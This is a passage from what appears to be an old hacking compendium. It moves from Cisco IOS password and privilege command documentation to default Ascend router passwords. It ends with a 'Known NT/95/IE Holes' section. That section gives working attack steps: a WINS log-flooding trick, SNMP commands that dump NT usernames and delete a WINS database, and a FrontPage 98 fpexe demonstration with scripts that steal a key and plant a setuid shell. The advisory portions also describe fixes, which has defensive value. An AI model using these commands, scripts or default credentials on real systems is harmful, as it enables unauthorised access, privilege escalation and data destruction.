8718be able to reenter enable mode. You cannot recover a lost password that has been encrypted by
8719any method.
8720If the service password-encryption command is set, the encrypted form of the password you
8721create with the enable password command is displayed when a show startup-config command
8722is entered.
8723You can enable or disable password encryption with the service password-encryption
8724command.
8725An enable password is defined as follows:
8726? Must contain from 1 to 25 uppercase and lowercase alphanumeric characters.
8727? Must not have a number as the first character.
8728? Can have leading spaces, but they are ignored. However, intermediate and trailing
8729spaces are recognized.
8730? Can contain the question mark (?) character if you precede the question mark with the
8731key combination Crtl-V when you create the password; for example, to create the
8732password abc?123, do the following:
8733? Enter abc.
8734? Type Crtl-V.
8735? Enter ?123.
8736When the system prompts you to enter the enable password, you need not precede the
8737question mark with the Ctrl-V; you can simply enter abc?123 at the password prompt.
8738Examples
8739In the following example, the password pswd2 is enabled for privilege level 2:
8740enable password level 2 pswd2
8741In the following example the encrypted password $1$i5Rkls3LoyxzS8t9, which has been copied
8742from a router configuration file, is set for privilege level 2 using encryption type 7:
8743enable password level 2 7 $1$i5Rkls3LoyxzS8t9
8744Related Commands
8745A dagger (†) indicates that the command is documented outside this chapter.
8746disable â€
8747enable â€
8748enable secret
8749privilege level (global)
8750service password-encryption
8751show privilege
8752show startup-config â€
8753
8754[12.8.0] enable secret
8755Use the enable secret global configuration command to specify an additional layer of security
8756over the enable password command. Use the no form of the command to turn off the enable
8757secret function.
8758enable secret [level level] {password | encryption-type encrypted-password}
8759no enable secret [level level]
8760Syntax Description
8761level level (Optional) Level for which the password applies. You can specify up to sixteen
8762privilege levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this
8763argument is not specified in the command or in the no form of the command, the privilege level
8764defaults to 15 (traditional enable privileges). The same holds true for the no form of the
8765command.
8766password Password users type to enter enable mode. This password should be different
8767from the password created with the enable password command.
8768encryption-type (Optional) Cisco-proprietary algorithm used to encrypt the password. Currently
8769the only encryption type available for this command is 5 . If you specify encryption-type, the next
8770argument you supply must be an encrypted password (a password encrypted by a Cisco router).
8771encrypted-password Encrypted password you enter, copied from another router configuration.
8772
8773Default
8774No password is defined. The default level is 15.
8775Command Mode
8776Global configuration
8777Usage Guidelines
8778This command first appeared in Cisco IOS Release 11.0.
8779Use this command in conjunction with the enable password command to provide an additional
8780layer of security over the enable password. The enable secret command provides better security
8781by storing the enable secret password using a non-reversible cryptographic function. The added
8782layer of security encryption provides is useful in environments where the password crosses the
8783network or is stored on a TFTP server.
8784You will not ordinarily enter an encryption type. Typically you enter an encryption type only if you
8785paste into this command an encrypted password that you copied from a router configuration file.
8786 Caution If you specify an encryption-type and then enter a cleartext password, you will not
8787be able to reenter enable mode. You cannot recover a lost password that has been encrypted by
8788any method.
8789If you use the same password for the enable password and enable secret commands, you
8790receive an error message warning that this practice is not recommended, but the password will
8791be accepted. By using the same password, however, you undermine the additional security the
8792enable secret command provides.
8793
8794Note After you set a password using enable secret command, a password set using the enable
8795password command works only if the enable secret is disabled or an older version of Cisco IOS
8796software is being used, such as when running an older rxboot image. Additionally, you cannot
8797recover a lost password that has been encrypted by any method.
8798
8799If service password-encryption is set, the encrypted form of the password you create here is
8800displayed when a show startup-config command is entered.
8801You can enable or disable password encryption with the service password-encryption
8802command.
8803An enable password is defined as follows:
8804? Must contain from 1 to 25 uppercase and lowercase alphanumeric characters
8805? Must not have a number as the first character
8806? Can have leading spaces, but they are ignored. However, intermediate and trailing
8807spaces are recognized.
8808? Can contain the question mark (?) character if you precede the question mark with the
8809key combination Crtl-V when you create the password; for example, to create the
8810password abc?123, do the following:
8811? Enter abc.
8812? Type Crtl-V.
8813? Enter ?123.
8814When the system prompts you to enter the enable password, you need not precede the
8815question mark with the Ctrl-V; you can simply enter abc?123 at the password prompt.
8816Examples
8817The following example specifies the enable secret password of gobbledegook:
8818enable secret gobbledegook
8819After specifying an enable secret password, users must enter this password to gain access. Any
8820passwords set through enable password will no longer work.
8821Password: gobbledegoo
8822In the following example the encrypted password $1$FaD0$Xyti5Rkls3LoyxzS8 , which has been
8823copied from a router configuration file, is enabled for privilege level 2 using encryption type 5:
8824enable password level 2 5 $1$FaD0$Xyti5Rkls3LoyxzS8
8825Related Commands
8826A dagger (†) indicates that the command is documented outside this chapter.
8827enable â€
8828enable password
8829
8830[12.8.1] ip identd
8831To enable identification support, use the ip identd global configuration command. Use the no
8832form of this command to disable this feature.
8833ip identd
8834no ip identd
8835Syntax Description
8836This command has no arguments or keywords.
8837Default
8838Identification support is not enabled.
8839Command Mode
8840Global configuration
8841Usage Guidelines
8842This command first appeared in Cisco IOS Release 11.1.
8843The ip identd command returns accurate information about the host TCP port; however, no
8844attempt is made to protect against unauthorized queries.
8845Example
8846In the following example, identification support is enabled:
8847ip identd
8848
8849[12.8.2] login authentication
8850To enable TACACS+ authentication for logins, use the login authentication line configuration
8851command. Use the no form of this command to either disable TACACS+ authentication for logins
8852or to return to the default.
8853login authentication {default | list-name}
8854no login authentication {default | list-name}
8855Syntax Description
8856default Uses the default list created with the aaa authentication login command.
8857list-name Uses the indicated list created with the aaa authentication login command.
8858Default
8859Uses the default set with aaa authentication login.
8860Command Mode
8861Line configuration
8862Usage Guidelines
8863This command first appeared in Cisco IOS Release 10.3.
8864This command is a per-line command used with AAA that specifies the name of a list of
8865TACACS+ authentication methods to try at login. If no list is specified, the default list is used
8866(whether or not it is specified in the command line).
8867 Caution If you use a list-name value that was not configured with the aaa authentication
8868login command, you will disable login on this line.
8869Entering the no version of login authentication has the same effect as entering the command
8870with the default argument.
8871Before issuing this command, create a list of authentication processes by using the global
8872configuration aaa authentication login command.
8873Examples
8874The following example specifies that the default AAA authentication is to be used on line 4:
8875line 4
8876login authentication default
8877The following example specifies that the AAA authentication list called list1 is to be used on line
88787:
8879line 7
8880login authentication list1
8881Related Command
8882aaa authentication login
8883
8884[12.8.3] privilege level (global)
8885To set the privilege level for a command, use the privilege level global configuration command.
8886Use the no form of this command to revert to default privileges for a given command.
8887privilege mode level level command
8888no privilege mode level level command
8889Syntax Description
8890mode Configuration mode. (See the alias command in the Configuration Fundamentals
8891Command Reference for a description of mode.
8892level Privilege level associated with the specified command. You can specify up to sixteen
8893privilege levels, using numbers 0 through 15.
8894command Command to which privilege level is associated.
8895Defaults
8896Level 15 is the level of access permitted by the enable password.
8897Level 1 is normal EXEC-mode user privileges.
8898Command Mode
8899Global configuration
8900Usage Guidelines
8901This command first appeared in Cisco IOS Release 10.3.
8902The description of the alias command, in the Configuration Fundametals Command Reference,
8903shows the options for the mode argument in the privilege level global configuration command.
8904The password for a privilege level defined using the privilege level global configuration
8905command is configured using the enable password command.
8906Level 0 can be used to specify a more-limited subset of commands for specific users or lines. For
8907example, you can allow user "guest" to use only the show users and exit commands.
8908
8909Note There are five commands associated with privilege level 0: disable, enable, exit, help, and
8910logout. If you configure AAA authorization for a privilege level greater than 0, these five
8911commands will not be included.
8912
8913When you set a command to a privilege level, all commands whose syntax is a subset of that
8914command are also set to that level. For example, if you set the show ip route command to level
891515, the show commands and show ip commands are automatically set to privilege level 15---
8916unless you set them individually to different levels.
8917Example
8918The commands in the following example set the configure command to privilege level 14 and
8919establish SecretPswd14 as the password users must enter to use level 14 commands.
8920privilege exec level 14 configure
8921enable secret level 14 SecretPswd14
8922Related Commands
8923enable password
8924enable secret
8925privilege level (line)
8926
8927[12.8.4] privilege level (line)
8928To set the default privilege level for a line, use the privilege level line configuration command.
8929Use the no form of this command to restore the default user privilege level to the line.
8930privilege level level
8931no privilege level
8932Syntax Description
8933level Privilege level associated with the specified line.
8934Defaults
8935Level 15 is the level of access permitted by the enable password.
8936Level 1 is normal EXEC-mode user privileges.
8937Command Mode
8938Line configuration
8939Usage Guidelines
8940This command first appeared in Cisco IOS Release 10.3.
8941Users can override the privilege level you set using this command by logging in to the line and
8942enabling a different privilege level. They can lower the privilege level by using the disable
8943command. If users know the password to a higher privilege level, they can use that password to
8944enable the higher privilege level.
8945You can use level 0 to specify a subset of commands for specific users or lines. For example, you
8946can allow user "guest" to use only the show users and exit commands.
8947You might specify a high level of privilege for your console line to restrict who uses the line.
8948Examples
8949The commands in the following example configure the auxiliary line for privilege level 5. Anyone
8950using the auxiliary line has privilege level 5 by default.
8951line aux 0
8952privilege level 5
8953The command in the following example sets all show ip commands, which includes all show
8954commands, to privilege level 7:
8955privilege exec level 7 show ip route
8956This is equivalent to the following command:
8957privilege exec level 7 show
8958
8959The commands in the following example set show ip route to level 7 and the show and show ip
8960commands to level 1:
8961privilege exec level 7 show ip route
8962privilege exec level 1 show ip
8963Related Commands
8964enable password
8965privilege level (line)
8966
8967[12.8.5] service password-encryption
8968To encrypt passwords, use the service password-encryption global configuration command.
8969Use the no form of this command to disable this service.
8970service password-encryption
8971no service password-encryption
8972Syntax Description
8973This command has no arguments or keywords.
8974Default
8975No encryption
8976Command Mode
8977Global configuration
8978Usage Guidelines
8979This command first appeared in Cisco IOS Release 10.0.
8980The actual encryption process occurs when the current configuration is written or when a
8981password is configured. Password encryption is applied to all passwords, including authentication
8982key passwords, the privileged command password, console and virtual terminal line access
8983passwords, and BGP neighbor passwords. This command is primarily useful for keeping
8984unauthorized individuals from viewing your password in your configuration file.
8985When password encryption is enabled, the encrypted form of the passwords is displayed when a
8986show startup-config command is entered. Caution This command does not provide a high level
8987of network security. If you use this command, you should also take additional network security
8988measures.
8989
8990Note You cannot recover a lost encrypted password. You must clear NVRAM and set a new
8991password.
8992
8993Example
8994The following example causes password encryption to take place:
8995service password-encryption
8996Related Commands
8997A dagger (†) indicates that the command is documented outside this chapter.
8998enable password
8999key-string â€
9000neighbor password â€
9001
9002[12.8.6] show privilege
9003To display your current level of privilege, use the show privilege EXEC command.
9004show privilege
9005Syntax Description
9006This command has no arguments or keywords.
9007Command Mode
9008EXEC
9009Usage Guidelines
9010This command first appeared in Cisco IOS Release 10.3.
9011Sample Display
9012The following is sample output from the show privilege command. The current privilege level is
901315.
9014Router# show privilege
9015Current privilege level is 15
9016Related Commands
9017enable password level
9018enable secret level
9019
9020[12.8.7] username
9021To establish a username-based authentication system, enter the username global configuration
9022command.
9023username name {nopassword | password password [encryption-type encrypted-password]}
9024username name password secret
9025username name [access-class number]
9026username name [autocommand command]
9027username name [callback-dialstring telephone-number]
9028username name [callback-rotary rotary-group-number]
9029username name [callback-line [tty] line-number [ending-line-number]]
9030username name [nocallback-verify]
9031username name [noescape] [nohangup]
9032username name [privilege level]
9033Syntax Description
9034name Host name, server name, user ID, or command name. The name argument can be only
9035one word. White spaces and quotation marks are not allowed.
9036nopassword No password is required for this user to log in. This is usually most useful in
9037combination with the autocommand keyword.
9038password Specifies a possibly encrypted password for this username.
9039password Password a user enters.
9040encryption-type (Optional) Single-digit number that defines whether the text immediately following
9041is encrypted, and, if so, what type of encryption is used. Currently defined encryption types are 0,
9042which means that the text immediately following is not encrypted, and 7, which means that the
9043text is encrypted using a Cisco-defined encryption algorithm.
9044encrypted password Encrypted password a user enters.
9045password (Optional) Password to access the name argument. A password must be from 1
9046to 25 characters, can contain embedded spaces, and must be the last option specified in the
9047username command.
9048secret For CHAP authentication: specifies the secret for the local router or the remote device.
9049The secret is encrypted when it is stored on the local router. The secret can consist of any string
9050of up to 11 ASCII characters. There is no limit to the number of username and password
9051combinations that can be specified, allowing any number of remote devices to be authenticated.
9052access-class (Optional) Specifies an outgoing access list that overrides the access list
9053specified in the access-class line configuration command. It is used for the duration of the user's
9054session.
9055number Access list number.
9056autocommand (Optional) Causes the specified command to be issued automatically after the
9057user logs in. When the command is complete, the session is terminated. Because the command
9058can be any length and contain embedded spaces, commands using the autocommand keyword
9059must be the last option on the line.
9060command The command string. Because the command can be any length and contain
9061embedded spaces, commands using the autocommand keyword must be the last option on the
9062line.
9063callback-dialstring (Optional) For asynchronous callback only: permits you to specify a
9064telephone number to pass to the DCE device.
9065telephone-number For asynchronous callback only: telephone number to pass to the DCE
9066device.
9067callback-rotary (Optional) For asynchronous callback only: permits you to specify a
9068rotary group number. The next available line in the rotary group is selected.
9069rotary-group-number For asynchronous callback only: integer between 1 and 100 that
9070identifies the group of lines on which you want to enable a specific username for callback.
9071callback-line (Optional) For asynchronous callback only: specific line on which you enable a
9072specific username for callback.
9073tty (Optional) For asynchronous callback only: standard asynchronous line.
9074line-number For asynchronous callback only: relative number of the terminal line (or the first
9075line in a contiguous group) on which you want to enable a specific username for callback.
9076Numbering begins with zero.
9077ending-line-number (Optional) Relative number of the last line in a contiguous group on
9078which you want to enable a specific username for callback. If you omit the keyword (such as tty),
9079then line-number and ending-line-number are absolute rather than relative line numbers.
9080nocallback-verify (Optional) Authentication not required for EXEC callback on the specified
9081line.
9082noescape (Optional) Prevents a user from using an escape character on the host to which
9083that user is connected.
9084nohangup (Optional) Prevents the security server from disconnecting the user after an
9085automatic command (set up with the autocommand keyword) has completed. Instead, the user
9086gets another login prompt.
9087privilege (Optional) Sets the privilege level for the user.
9088level (Optional) Number between 0 and 15 that specifies the privilege level for the user.
9089Default
9090None
9091Command Mode
9092Global configuration
9093Usage Guidelines
9094The following commands first appeared in Cisco IOS Release 10.0:
9095username name {nopassword | password password [encryption-type encrypted-password]}
9096username name password secret
9097username name [access-class number]
9098username name [autocommand command]
9099username name [noescape] [nohangup]
9100username name [privilege level]
9101The following commands first appeared in Cisco IOS Release 11.1:
9102username name [callback-dialstring telephone-number]
9103username name [callback-rotary rotary-group-number]
9104username name [callback-line [tty] line-number [ending-line-number]]
9105username name [nocallback-verify]
9106The username command provides username and/or password authentication for login purposes
9107only. (Note that it does not provide username and/or password authentication for enable mode
9108when the enable use-tacacs command is also configured.)
9109Multiple username commands can be used to specify options for a single user.
9110Add a username entry for each remote system that the local router communicates with and
9111requires authentication from. The remote device must have a username entry for the local router.
9112This entry must have the same password as the local router's entry for that remote device.
9113This command can be useful for defining usernames that get special treatment. For example, you
9114can use this command to define an "info" username that does not require a password, but
9115connects the user to a general purpose information service.
9116The username command is required as part of the configuration for the Challenge Handshake
9117Authentication Protocol (CHAP). Add a username entry or each remote system the local router
9118requires authentication from.
9119
9120Note To enable the local router to respond to remote CHAP challenges, one username name
9121entry must be the same as the hostname name entry that has already been assigned to your
9122router.
9123
9124If there is no secret specified and the debug serial-interface command is enabled, an error is
9125displayed when a link is established and the CHAP challenge is not implemented. CHAP
9126debugging information is available using the debug serial-interface and debug serial-packet
9127commands. For more information about debug commands, refer to the Debug Command
9128Reference.
9129Examples
9130To implement a service similar to the UNIX who command, which can be entered at the login
9131prompt and lists the current users of the router, the username command takes the following form:
9132
9133username who nopassword nohangup autocommand show users
9134To implement an information service that does not require a password to be used, the command
9135takes the following form:
9136username info nopassword noescape autocommand telnet nic.ddn.mil
9137To implement an ID that works even if the TACACS servers all break, the command takes the
9138following form:
9139username superuser password superpassword
9140The following example configuration enables CHAP on interface serial 0. It also defines a
9141password for the local server, Adam, and a remote server, Eve.
9142hostname Adam
9143
9144interface serial 0
9145
9146encapsulation ppp
9147
9148ppp authentication chap
9149
9150username Adam password oursystem
9151
9152username Eve password theirsystem
9153
9154When you look at your configuration file, the passwords will be encrypted and the display will look
9155similar to the following:
9156hostname Adam
9157
9158interface serial 0
9159
9160encapsulation ppp
9161
9162ppp authentication chap
9163
9164username Adam password 7 1514040356
9165
9166username Eve password 7 121F0A18
9167Related Commands
9168A dagger (†) indicates that the command is documented outside this chapter. Two daggers (††)
9169indicate that the command is documented in the Debug Command Reference.
9170arap callback â€
9171callback-forced-wait â€
9172debug callback †â€
9173ppp callback â€
9174
9175[12.8.8] A Word on Ascend Routers
9176
9177Ascend routers or ok, but they’re not as powerful or as configurable as Cisco. So we will not
9178spend as much time on them. Actually we will not spend any time on them…The only thing we
9179will say is that unless an Administrator changes the password.. the default password on an
9180Ascend is either blank or ascend.
9181
9182[13.0.0] Known NT/95/IE Holes
9183
9184[13.0.1] WINS port 84
9185
9186Found by NeonSurge (rhino9 team)
9187
9188This is not a critical bug. Its actually more of a nuissance than anything else. If you telnet or
9189stream data to port84 of an NT server, it will cause an error to be recorded in the event long. In
9190some systems, this can cause the hard drive to completely fill up with error messages, causing
9191other applications to fail due to lack of drive space. The flaw will also cause the server to respond
9192extremely slow.
9193
9194For the telnet attack, simply telnet to the WINS port on an NT server and type on garbage
9195characters, hit enter and it will cause the event log entry.
9196
9197The same effect was achieved by using an application called pepsi to stream UDP informaiton to
9198the same port.
9199
9200[13.0.2] WindowsNT and SNMP
9201
9202Found by Christopher Rouland (from ntsecurity.net)
9203
9204Christopher writes:
9205
9206I have found two significant "features" in the SNMP agent implementations under NT 4.0 Server,
9207and I am sure there are more if I feel like really digging. The first issue I sent in earlier this year to
9208Microsoft and received no response other than "expected behavior" and the second I just found
9209and puts any large NT shop at a serious denial of service (DOS) risk.
9210
92111. This first exploit demonstrates the ability via SNMP to dump a list of all usernames in an NT
9212domain (assuming the target box is a DC) or on an NT Server.
9213Here is the simplest NT example I could find to use this:
9214C:\NTRESKIT>snmputil walk public .1.3.6.1.4.1.77.1.2.25
9215should be a domain controller or server
92162.The second exploit demonstrates the ability via SNMP to delete all of the records in a WINS
9217database remotely, bypassing all NT security. If you understand large scale WINS
9218architecture, you can understand the implications of this. Knowledge of SNMP community
9219strings would allow an attacker to effectively shut down any large NT infrastructure with "N"
9220commands (N=number of WINS servers). This is permitted due to the extensive "cmd" set
9221implemented in the WINS extension agent, specifically:
9222
92232. cmdDeleteWins OBJECT-TYPE
9224SYNTAX IpAddress
9225ACCESS read-write
9226STATUS mandatory
9227DESCRIPTION
9228"This variable when set will cause all information pertaining to a WINS (data records, context
9229information to be deleted from the local WINS. Use this only when owner-address mapping
9230tables getting to near capacity. NOTE: deletion of all information pertaining to the managed
9231WINS is not permitted"
9232::= { cmd 3 }
9233Since the SNMP toolset implemented under NT will not do snmp-set-requests, my sample
9234exploit was done using the CMU SNMP development kit under Unix. The command
9235"rnjdev02:~/cmu$ snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a
9236192.178.16.2" successfully entirely deleted my WINS database.
9237
92383. It appears that there are several other pieces of the LMMIB2 definition that allow for things
9239such as remote session deletion or disconnect, etc, but I have not yet looked into them.
9240
92414. Stopping the Problem:
9242The simplest fix is to disable SNMP, or to remove the extension agents through the SNMP
9243configuration in the registry.
9244If you MUST use SNMP, then at least block inbound access to that port. Be aware that using
9245NT's various SNMP agents, a malicious intruder could gain knowledge about your entire
9246network. In fact, they could quite easily gain everything they need to enter your network,
9247except a password -- and those come in due time. BEWARE.
9248
9249[13.0.3] Frontpage98 and Unix
9250
9251Found by Marc Slemko (from netsecurity.net)
9252
9253The attack was described most adequated by the discoverer:
9254Change History
9255Sat Oct 11 1997: Initial posting of web page
9256Wed Oct 15 1997: Microsoft posted a note responding to the issues raised. I am glad to see that
9257they have plans to release the source of the revised version for review when it is complete. I will
9258update this page with further comments when the fixed version is released.
9259Wed Oct 22 1997: Microsoft has released a new version of the extensions that claim to fix the
9260security issues. I will comment further on the security of their proposed fix after I have time to
9261review the changes. Check back here in a few days for my comments.
9262Introduction
9263The information below talks about using Microsoft's FrontPage 98 extensions with Apache on
9264Unix with Microsoft's mod_frontpage changes. This do not apply to running it on any other server
9265or to running it on Unix without the Microsoft mod_frontpage changes or to running it on Windows
9266NT. There are, however, other security issues on such servers, some of which are similar to
9267those in the FrontPage 97 extensions. I should also note that the Unix server extensions seem to
9268be written in part or completely by Ready-to-Run Software Inc. (RTR) for Microsoft. I will refer to it
9269as Microsoft's product because it is, no matter who wrote it. This discussion is specific to the
9270FrontPage 98 extensions. For more general information on some security problems in earlier
9271versions, some of which are resolved and some of which aren't, see Scott Fritchie's Why I Don't
9272Like Microsoft's FrontPage Web Authoring Tool web page. Parts of it are no longer entirely
9273relevant, but it provides a good background.
9274It is no secret that the security of the FrontPage 97 and earlier Unix server extensions is quite
9275poor, if Microsoft's instructions are followed. Some of their instructions were quite hilarious when
9276first released, like the suggestion of running your web server as root. It is possible to make them
9277more acceptable--acceptable enough for some sites--but it requires careful work by the
9278administrator.
9279It had appeared like Microsoft had increased the security of the extensions in the FP98 version
9280available from Microsoft's Web Site. However, a closer examination reveals startling flaws. What
9281they have done is make a small setuid root wrapper that the web server calls. This wrapper than
9282setuid()s to the appropriate user and runs the requested FP CGI as that user. The problem lies in
9283the fact that the wrapper ("fpexe") is written very poorly. while making such a wrapper secure can
9284be difficult, the gaping holes in this program show a complete lack of understanding of security in
9285the Unix environment.
9286The fpexe program is available for you to inspect yourself. It was originally posted in RTR's
9287FrontPage FAQ. This version is not exactly the same as the one currently distributed (at least it is
9288not the same as the one in the BSD/OS 2.1 kit), but it is close. Both appear to exhibit the same
9289failings.
9290When I refer to the FP CGI programs, I am referring to the three files normally referenced under
9291the _vti_bin directory: shtml.exe, admin.exe and author.exe.
9292The key in this discussion is the fact that nothing is stopping anyone from trying to run this fpexe
9293wrapper. If they can trick it into running, they can possible gain privileges they shouldn't.
9294How It Works
9295Before you can understand the holes in the FP server extensions, you need to understand what I
9296mean when I talk about the "key". When the Frontpage-modified Apache server starts up, it
9297generates a pseudo-random string of 128 ASCII characters as a key. This key is written to a file
9298that is only readable by the user that starts Apache; normally root. The server than passes the
9299key to fpexe. Since fpexe is setuid root, it can compare the key stored on disk with the one it was
9300passed to be sure they match; if not, it refuses to run. This is used in an attempt to guarantee that
9301the only thing calling fpexe is the web server. Used properly this is a powerful part of possible
9302security precautions. I am not convinced that the generation of the key is cryptographically
9303adequate and it may be subject to intelligent guessing attacks, however I have not looked at it to
9304see. As discussed later, the cryptographical robustness of the key doesn't really matter.
9305There are a number of problems with the setuid root fpexe program. I am not attempting a
9306complete description of all the problems and their possible consequences and fixes, just making a
9307light sweep over the top. The more obvious problems include:
9308Return codes from library calls are not properly checked. An example:
9309f = fopen( buf, "r");
9310fgets( key, 129, f );
9311fclose(f);
9312If fopen() failed (easy to make it do so with ulimit -n), then if your system did not core dump on a
9313fgets() on a closed descriptor you would end up with an empty key. It is obviously easy to guess
9314an empty key. I am not aware of any systems that exhibit this exact problem, but it is possible.
9315Return codes need to be checked, especially in setuid programs.
9316Proper bounds checking is not done. This leads to obvious buffer overflows. An example:
9317strcpy( work, FPDIR );
9318strcat( work, getenv("FPEXE") );
9319I won't go into the details of what this does, but if you could cause this code to be executed, you
9320could insert your own code on most systems and likely gain access to the UID the program is
9321running as (root). This proves to be an unnecessary effort to go to, because this code is only
9322executed if you have the correct key; if you have the correct key, there are far easier ways to gain
9323access. Buffer overflows are one of the most popular (albeit normally boring) types of new holes
9324in programs being publicized.
9325It does not clean the environment variables before starting the CGI. Again, this means you can
9326gain access to the UID that the program runs as (not root). If the rest of the program was securely
9327written, this could possibly be an issue however it is of little consequence currently due to the
9328gaping holes in other areas.
9329It assumes that if you have the key, then you are authorized to have it run any program as nearly
9330any user you tell it to. The process you are running also needs to be in the same process group
9331as the web server; all CGIs run by the server, however, are in the same process group so if you
9332can run a CGI script you can work around the second check. It does no further checks to be sure
9333you are running as a user that should be allowed to run FrontPage CGIs (other than disallowing
9334UID 0; the compiled version also disallows gid 0, however the source version doesn't) or that you
9335are running a Frontpage related program. This means that if you get the key file, you can gain
9336access to any non-root UID on the server. On 99% of boxes, that will give you root. For example,
9337if binaries are owned by bin then become bin and replace one that is run by root from cron. The
9338possibilities are endless once you obtain this level of access.
9339And, finally, the worst: it passes the key to fpexe via an environment variable! On most systems,
9340environment variables are available via "ps -e". This means that anyone with access to run
9341programs on the system (and there are often more people than you think that are able to do this,
9342due to things such as CGIs) can see it as it is being passed from the web server to fpexe. Recall
9343that once you have the key, there is little remaining before you can get full access to the system.
9344Demonstration
9345By now, it should be obvious that there is a serious security problem in the FrontPage 98 server
9346extensions. Here is one demonstration; do not think that this is the only way or that just because
9347you prevent one step of this process from working it is any more difficult to exploit the security
9348holes.
9349First I have to find the key. This can be done by using ps to get the environment from fpexe. To
9350do this, I first setup a loop running (this assumes a real aka. Bourne shell; if you use the bastard
9351C-shell it obviously won't work as written):
9352while true; do ps axuwwe -U nobody | grep FPKEY; done
9353Then I used ZeusBench, a very simple HTTP benchmark program, to generate load on the
9354server:
9355zb localhost /fp/_vti_bin/shtml.exe -c 50 -t 30
9356Any method of generating traffic could be used, including a web browser. Since I am using a very
9357inefficient method of looking for a process, I need to generate lots of traffic to increase my chance
9358of finding one. It certainly isn't likely to happen on the first request. The requests do have to be
9359made to a FP CGI script so it will call fpexe.
9360Before long, I had what I wanted from ps (manually wrapped):
9361nobody 28008 0.0 0.2 180 76 ?? DN 6:51PM 0:00.01
9362SCRIPT_URL=/fp/ SCRIPT_URI=http://localhost/fp/ FPUID=1000 FPGID=1000
9363FPEXE=/_vti_bin/shtml.exe FPKEY=9AF675E332F7583776C241A4795FE387D8E5DC80E77
93643FAB70794848FDEFB173FF14CDCDC44F3FAAF144A8C95A81C04BF5FC2B9EFDE3C8DCA1
9365049CD
9366F760364E59 HTTP_USER_AGENT=ZeusBench/1.0 HTTP_ACCEPT=*/*
9367PATH=/sbin:/usr/sbin:/bin:/usr/local/bin:/usr/bin:/usr/local/sbin/
9368SERVER_SOFTWARE=Apache/1.2.5-dev SERVER_NAME=localhost SERVER_PORT=80
9369REMOTE_HOST=localhost REMOTE_ADDR=127.0.0.1
9370DOCUMENT_ROOT=/usr/local/etc/httpd/htdocs SERVER_ADMIN=marcs@znep.com
9371SCRIPT_FILENAME=/usr/local/frontpage/currentversion/apache-fp/_vti_bin/fpexe
9372REMOTE_PORT=2849 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.0
9373REQUEST_METHOD=GET QUERY_STRING= REQUEST_URI=/fp/_vti_bin/shtml.exe
9374SCRIPT_NAME=/fp/_vti_bin/shtml.exe fpexe
9375Then I need to use the key to make fpexe think I am the web server. I can't just run this from a
9376normal shell, since I need to be in the same process group as the web server. A simple CGI
9377suffices:
9378#!/bin/sh
9379echo Content-type: text/plain
9380echo
9381export FPUID=3;
9382export FPGID=3;
9383export FPEXE=../../../../../../../../tmp/gotcha;
9384export
9385FPKEY=9AF675E332F7583776C241A4795FE387D8E5DC80E773FAB70794848FDEFB173
9386FF14CDCDC44F3FAAF144A8C95A81C04BF5FC2B9EFDE3C8DCA1049CDF760364E59
9387/usr/local/frontpage/currentversion/apache-fp/_vti_bin/fpexe 2>&1
9388
9389I need a program for it to run (/tmp/gotcha in this example):
9390#!/bin/sh
9391/usr/bin/id
9392cp /bin/sh /tmp/.mysh
9393chmod u+s /tmp/.mysh
9394Then I simply make a HTTP request for the CGI script. I can then run /tmp/.mysh at my leisure to
9395gain access to UID 3 (bin on my system) and do what I want from there.
9396Stopping the Problem:
9397Load the new extensions from here. So now you want to fix it. Well. That's the hard part. The only
9398real solution is for someone (either Microsoft or a third party) to do some work to improve the
9399security. It is possible to do this securely. Microsoft hasn't. They have no excuse. This page will
9400be updated when (if?) better fixes become available.
9401The Apache web server has a suEXEC wrapper designed to allow for a similar thing; that is,
9402execution of CGI scripts under a user's own UID. It is very restrictive (some would say anal)
9403about what it allows: there is a reason for that, as Microsoft's obviously failed attempt at security
9404shows. It is possible that suEXEC could be adapted to function in conjunction with FrontPage,
9405however it will not work without source modifications.
9406One short term workaround until Microsoft addresses the issue is to simply remove the
9407FrontPage setup from your system. This can be done temporarily by removing the setuid bit from
9408fpexe (ie. chmod u-s fpexe). This will prevent all the pretty FrontPage CGIs from working. It will
9409prevent people from uploading new pages using FrontPage's own methods (ie. they can tell
9410FrontPage to use FTP and they will still be uploaded), but generic content that doesn't rely on
9411FrontPage's server side CGI scripts should work fine.
9412Another possible workaround is to prevent users from running the ps command. This could have
9413a very negative impact on your system if things depend on it, and is a poor solution however it
9414may be the best one for you. On systems that don't use a procfs (/proc) based ps, you can
9415normally simply remove world execute permissions from it to disable it. If you are on a system like
9416Linux that normally uses a procfs for ps to get information, this doesn't solve the problem
9417because someone can read from the procfs directly.
9418Last of all, since this problem only occurs when using FrontPage with the mod_frontpage
9419extensions, it is possible to use the FrontPage extensions on Apache without using
9420mod_frontpage or fpexe. Unfortunately, this conversion is not easy. It means that, after
9421recompiling Apache without any of the Microsoft modifications (just commenting out
9422mod_frontpage from the Configuration file may be enough; haven't checked) you have to either
9423manually copy the FrontPage CGIs to the appropriate subdirectory under each user's web
9424directory and make them setuid to that user or copy them (or make links) and don't make them
9425setuid to that user. The former preserves the current ownership. With the latter all the user's web
9426files will need to be changed back to being owned by the user the web server runs as or else they
9427will be unable to manipulate them and some of the FP CGIs won't run correctly. This is a pain and
9428brings you back to the horrible security practice of letting anyone who can run CGIs modify any
9429FrontPage user's files. Although this may be the best temporary workaround (although quite
9430annoying if you have a large number of users), I can not go into step by step details of how to
9431accomplish this change because I am not fully familiar with various ways of using the FrontPage
9432extensions. The Microsoft FP security considerations document (part of the FP98 Server
9433Extensions Resource Kit) provides some more details of the method in which the CGIs are run
9434without fpexe.
9435Comments:
9436This sort of continued disregard for security is unacceptable and inexcusable. It does not take
9437significant knowledge to know that some of the things being done are flawed. If internal expertise
9438is not available, an external consultant should be hired for a security review of any critical code
9439such as fpexe. This is not rocket science nor is it particularily advanced programming. Nothing
9440that I have described above is complicated or new. Code reviews are common practice in many
9441companies and serve good purpose.
9442Once Microsoft fixes their glaring holes, assuming they do, I would suggest you should consider if
9443you want to run their FrontPage extensions at all. Even though, once fpexe is properly fixed, you
9444only risk the accounts of users using FrontPage (since that is who the FrontPage CGI scripts run
9445as), that can be a significant risk. It is very possible that when someone gets bored they will find a
9446hole in the FrontPage CGI scripts that gives them user level access to your system. And
9447Microsoft doesn't (and isn't likely to in the future, if their past is any indication) give the source to
9448those. Microsoft's own source speaks better for itself than anyone else ever could.
9449I have this nagging feeling that this will result in Microsoft coming out with a "fixed" version and
9450not releasing the source to it at all. After all, it was only after the source came out that these flaws
